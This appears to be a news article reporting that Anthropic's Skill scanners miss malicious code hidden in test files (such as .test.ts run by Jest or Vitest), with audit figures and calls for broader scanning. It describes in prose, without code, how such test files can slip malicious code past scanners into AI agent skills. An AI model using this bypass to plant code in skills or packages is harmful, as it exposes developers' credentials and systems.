Anthropic Skill Scanners Miss Malicious Code in Test Files
Anthropic’s Skill scanners, designed to ensure security in AI agent skills, have been found lacking. Gecko Security uncovered a vulnerability where malicious code can sneak into a system via overlooked test files, bypassing the scanner’s scrutiny. This revelation is a stark reminder of the blind spots in current security practices and poses significant risks for developers and companies relying on open-source skill marketplaces.
### Understanding the Anthropic Skill Scanners
Anthropic Skill scanners are intended to detect malicious code in AI agent skills sourced from platforms like ClawHub and skills.sh. These scanners focus on scrutinizing markdown instructions, prompt injections, and shell commands within the core skill files. However, they fail to examine adjacent test files, such as .test.ts files, which fall outside the agent execution surface. Despite not being part of the execution, these files can still run via test runners like Jest and Vitest, gaining unauthorized access to sensitive information. The oversight highlights a critical gap in the security measures meant to protect systems from malicious skill injections.
### Competitive Context and Security Audits
The security landscape for AI agent skills has been under scrutiny with multiple audits exposing vulnerabilities. A SkillScan academic study revealed that 26.1% of the 31,132 Anthropic Skills analyzed contained vulnerabilities. Snyk’s ToxicSkills audit further corroborated these findings, identifying critical-level security issues in 13.4% of the skills from ClawHub and skills.sh. Despite these efforts, Gecko Security’s discovery suggests that current audits and tools, including Cisco’s AI Agent Security Scanner, are not comprehensive enough. They miss critical aspects like test files that can harbor malicious code and exploit trust-on-install practices.
### Implications for Founders, Engineers, and the Industry
This development poses significant implications for founders, engineers, and the broader industry. For developers, the oversight in Anthropic’s Skill scanner emphasizes the need for more robust security practices that extend beyond standard scanning protocols. Engineers must now consider additional layers of security checks, particularly for test files, to safeguard against unauthorized access and data breaches. For startups and companies, this revelation underscores the importance of scrutinizing the security measures of third-party tools and the need for ongoing vigilance in integrating AI skills from open-source platforms.
More broadly, this incident serves as a call to action for the industry to reevaluate security frameworks and ensure they evolve in tandem with new attack vectors. It highlights the necessity for a holistic approach to security that encompasses all aspects of code execution and file management.
### What Happens Next
Moving forward, the industry must address these vulnerabilities by expanding the scope of security audits and enhancing tool capabilities to include test files in their scans. For developers and founders, this means prioritizing security from the ground up, ensuring that all potential entry points are fortified against exploitation. Investors and stakeholders should also push for transparency and accountability in security practices to protect their interests and maintain trust in AI technologies.




















